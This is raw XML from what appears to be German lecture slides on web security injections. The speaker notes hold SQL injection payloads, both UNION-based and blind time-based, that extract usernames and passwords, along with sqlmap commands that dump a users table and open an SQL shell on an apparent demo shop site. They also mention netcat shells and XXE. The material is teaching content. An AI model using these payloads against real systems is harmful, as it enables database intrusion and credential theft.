          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:25:45.364" v="6861" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="89113158" sldId="468"/>
            <ac:spMk id="3" creationId="{D5D627FF-DFA5-4543-B511-196EC7DE1D6F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:27:08.309" v="6880" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="89113158" sldId="468"/>
            <ac:spMk id="7" creationId="{5E7D3DA8-CCE2-45CB-9C48-C1FB2C440583}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:26:15.409" v="6867" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="89113158" sldId="468"/>
            <ac:picMk id="4" creationId="{957ADEB8-DC07-4D1B-8FF4-FC5A282B2CE6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:26:43.814" v="6875" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="89113158" sldId="468"/>
            <ac:picMk id="1026" creationId="{74D1F855-9BA5-401E-9FA9-4F35DB8FE6C3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-12-06T11:14:04.573" v="8083" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1498306890" sldId="469"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:28:21.684" v="6883" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1498306890" sldId="469"/>
            <ac:spMk id="2" creationId="{06ACF09B-4C80-4A1F-83D5-913A89A4DD70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:28:43.042" v="6885"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1498306890" sldId="469"/>
            <ac:spMk id="3" creationId="{F74CA33C-8CDD-4598-A887-8D2293285876}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:32:21.110" v="6898" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1498306890" sldId="469"/>
            <ac:spMk id="6" creationId="{F8E40FE9-A5A1-4809-94F8-0839EAA6AF05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:32:25.124" v="6899" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1498306890" sldId="469"/>
            <ac:spMk id="8" creationId="{E85A050C-3E21-4D98-A6FB-F7BD2052D8A1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:28:54.471" v="6886"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1498306890" sldId="469"/>
            <ac:picMk id="2052" creationId="{88ADB578-D42B-4AE9-B36E-D123AE8596CF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:54:15.051" v="7287" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1250088202" sldId="470"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:54:15.051" v="7287" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1250088202" sldId="47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6:54:21.094" v="7289" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="344832928" sldId="471"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:54:21.094" v="7289" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="344832928" sldId="47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6:54:29.381" v="7291" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="352397832" sldId="472"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:54:29.381" v="7291" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="352397832" sldId="47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5:14.050" v="7298" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1851207103" sldId="473"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:15:14.050" v="7298" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1851207103" sldId="473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15:48.861" v="7306"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1612628158" sldId="474"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:15:23.944" v="7300" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1612628158" sldId="474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15:47.331" v="7304"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3449101246" sldId="475"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:15:32.887" v="7302" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3449101246" sldId="47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9:52.535" v="7309" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3565963150" sldId="476"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:19:52.535" v="7309" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3565963150" sldId="47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9:57.834" v="7311" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4203446312" sldId="477"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:19:57.834" v="7311" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203446312" sldId="477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21:14.248" v="7400"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2138855089" sldId="478"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:20:09.808" v="7313" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2138855089" sldId="478"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:21:07.517" v="7398"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4163693901" sldId="479"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:20:17.406" v="7315" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4163693901" sldId="47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30.789" v="7403" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4196166211" sldId="480"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:30:30.789" v="7403" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4196166211" sldId="48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36.634" v="7405" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4181788556" sldId="481"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:30:36.634" v="7405" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4181788556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42.957" v="7407" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1772708056" sldId="482"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:30:42.957" v="7407" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1772708056" sldId="48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47.467" v="7409" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3018192824" sldId="483"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:30:47.467" v="7409" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3018192824" sldId="483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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:30:53.107" v="7411" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1054107156" sldId="484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23.02.2021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'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' or 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=2;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1; Select @@version;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1 UNION Select @@version;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1 UNION Select @@version, null, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select @@version, null, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select @@version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, null, null from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, password, null, null from users;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://lightside.me/shop/blind.php?id=1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1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' or 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 or 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and 1=2;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 UNION Select @@version;-- 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and 1=1;-- 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and true = false;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = true;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,1) = 'm', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,1) = 'x', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,2) = 'ma', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 UNION SELECT IF(SUBSTRING(uname,1,1) = 'm', sleep(5), false) FROM users LIMIT 1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://lightside.me/shop/blind.php?id=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://lightside.me/shop/blind.php?id=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://lightside.me/shop/blind.php?id=1 -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://lightside.me/shop/blind.php?id=1 -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -T users --dump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -u http://lightside.me/shop/blind.php?id=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightside.users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2500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2717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Einer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kommentaren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meint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es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ihm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nähe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> war und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tatsächlich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>geklappt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hat – bin mir da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so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sicher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ^^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6048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PINGO QUIZ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>NoSQL, XML/XPATH , SMTP, LDAP, OS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, 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0004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4972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4088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1993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9760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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>path-traversal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haben wir hier auch! (ist aber in dem Fall das geringere Übel)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1566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r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Angriffstools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nachladen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>richtige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aufmachen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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netzwerk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ausbreiten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datenbanken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auslesen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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656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https://portswigger.net/web-security/os-command-injection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952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2854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9211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6156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almost every programming language has a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()” function -&gt; no need for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command execution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913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0760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5484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mögliche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ziele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bestehende</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>überschreiben</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, DoS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4244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07538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https://wiki.selfhtml.org/wiki/PHP/Tutorials/File_Upload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3504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9184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5558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3802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5828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2835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11903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23096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07148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84564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PINGO QUIZ Injections -&gt; Billion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Laughs Attack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77103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https://imgflip.com/memegenerator/Star-Wars-Yoda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472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4243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3374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9182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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> eigentlich recht umständlich. Bei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> einfacher. Und bei anderen Sprachen erst recht einfacher.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9320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Aber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ORMs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aufpassen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man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nicht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> erst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>recht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wieder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vulnerable Statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reinschreibt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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67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39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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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23.02.2021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png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38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6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3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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41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2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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424.png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7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image426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9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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Server-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 err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, XPath Injection, OS Command Injection, File Upload, XXE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8F5C6FF-0D6C-4369-902D-DA109B4F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19" y="1755401"/>
